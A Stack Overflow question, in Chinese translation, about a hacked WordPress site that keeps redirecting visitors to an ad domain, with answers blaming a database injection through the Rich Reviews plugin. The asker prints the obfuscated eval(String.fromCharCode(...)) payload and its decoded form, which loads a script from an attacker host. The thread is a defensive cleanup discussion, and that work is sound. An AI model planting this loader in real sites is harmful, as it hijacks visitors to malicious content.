【问题标题】:How to retrive hacked wordpress site如何找回被黑的wordpress网站
【发布时间】:2020-01-30 08:59:13
【问题描述】:

所以基本上我客户的网站被黑了,每次我打开时,它都会重定向到另一个网站(主要是广告)。

它的行为,每次我运行网站时,它都会自动改变主页 url 和站点 url。

我试过了,我在 cpanel 中更改了主页 url 和站点 url,但我再次运行它重定向的站点。之后它也会自动更改为 cpanel 中的那个地址。

在 cpanel 中更改 url 后,我可以访问后端,直到运行前端。我使用 Sucuri 插件运行扫描,它在下面给出错误消息,

11: 1569826918_2:"Error: admin, 122.160.112.18; General settings changed: (multiple entries): siteurl: from 'https:\/\/foo.com' to 'https:\/\/bes.belaterbewasthere.com\/reserv\/\/t3.js?',home: from 'https:\/\/foo.com' to 'https:\/\/bes.belaterbewasthere.com\/reserv\/\/a3.js?'"

出于隐私原因更改了网站地址。重定向网址就在那里。

我检查了所有可能的文件,但找不到任何可疑代码。谁能帮帮我。

编辑: 经过几个小时的研究,我发现这是从下面的加密代码中注入的, eval(String.fromCharCode(32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,101,108,101,109,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,9,101,108,101,109,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,32,10,32,32,32,32,101,108,101,109,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,98,101,115,46,98,101,108,97,116,101,114,98,101,119,97,115,116,104,101,114,101,46,99,111,109,47,99,111,114,110,47,102,108,101,120,46,106,115,63,116,112,61,55,57,57,39,59,10,32,32,32,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,101,108,101,109,41,59,10,32,32,125,41,40,41,59));

当我解密这段代码时(来自这个网站https://malwaredecoder.com/),我得到了这个,

eval( (function() { var elem = document.createElement('script'); elem.type = 'text/javascript'; elem.src = 'https://bes.belaterbewasthere.com/corn/flex.js?tp=799'; document.getElementsByTagName("head")[0].appendChild(elem); })();); 是的!这是重定向的网址https://bes.belaterbewasthere.com 并抛出广告。

【问题讨论】:

  • 可以修改cpanel、ftp、mysql服务器的密码,然后检查文件和文件夹的权限
  • 你检查数据库了吗?该恶意软件很可能已被注入数据库。
  • 你有代码和数据库的备份吗?在本地一次恢复一个,以便您确定问题出在数据库还是代码库中。
  • @Jiniesh 还是一样。

标签: jquery wordpress malware


【解决方案1】:

两天前我遇到了同样的问题,当代码还不存在时,我通过用两周前的数据库覆盖整个数据库来解决我的问题。 该代码位于 Rich Reviews 使用的表格中,并被注入其中。该插件因这个问题而闻名,并因此从 Wordpress 中删除。 在删除插件后,我与 Google adwords 取得了联系,他们检查了现在是否一切正常,然后他们重新启动了 adwords 活动。

如果您没有备份,您可以尝试仅删除与代码所在的表关联的插件(可能也是 Rich Reviews)来解决问题。我遇到这个问题的表是 rr_options。

【讨论】:

    猜你喜欢
    • 1970-01-01
    • 2023-03-30
    • 1970-01-01
    • 1970-01-01
    • 2015-12-23
    • 2015-12-06
    • 1970-01-01
    • 1970-01-01
    • 1970-01-01
    相关资源
    最近更新 更多